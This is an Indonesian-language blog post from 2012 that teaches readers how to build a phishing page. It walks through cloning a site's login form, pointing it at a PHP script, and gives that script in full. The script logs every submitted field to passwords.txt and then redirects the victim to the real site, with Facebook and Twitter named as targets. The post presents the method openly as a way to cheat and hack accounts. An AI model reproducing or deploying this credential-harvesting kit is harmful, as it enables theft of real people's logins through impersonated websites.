Apa yang anda cari ?


CSS

Senin, 01 Oktober 2012

TUTORIAL PHISING/HACK SITE APA AJA

·
Siapa yang suka curang,pasti kalau masalah hack fb tuh kalian nomor satu,kerjaan setan ini mah,tapi kalau ini setannya lain,ya udah dari pada panjang lebar bicarain setan mending langsung aja ya!!
 








1. pilih site target yg mau dijadiin halaman phising
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.htm
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini


Code:
<form action="RANDOM URL" method="post">

4. ganti url "RANDOM URL" jadi write.php trus ganti "post" jadi get
5. save
6. bikin "write.php"





Code:

<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


7. ganti tulisan yg http://RANDOM diatas jadi alamat yg diphising misal http://facebook.com
NB : Alamat bisa juga yang lain antara lain (Twitter.Blogger.DLL ) yang sering dipakai orang banyak gitu
8. save
9. upload deh dalam direktori yg sama ... ;))

sekian dari ane ...
btw repost gak yah ? klo repost delete aja ...
Terus Masukkin Ke File Hosting Rubah chmod 777 di file password.txt



Comments
0 Comments

0 komentar:

Poskan Komentar

Mari berpartisipasi dalam berkomentar,dengan diberikannya hak untuk menyatakan pendapat dan berbicara ,mari nyatakanlah pendapatmu tentang artikel diatas asalkan tidak berunsur SPAM/Penipuan,tidak berbau pornografi dan menggunakan bahasa yang ramah.

handapeunpost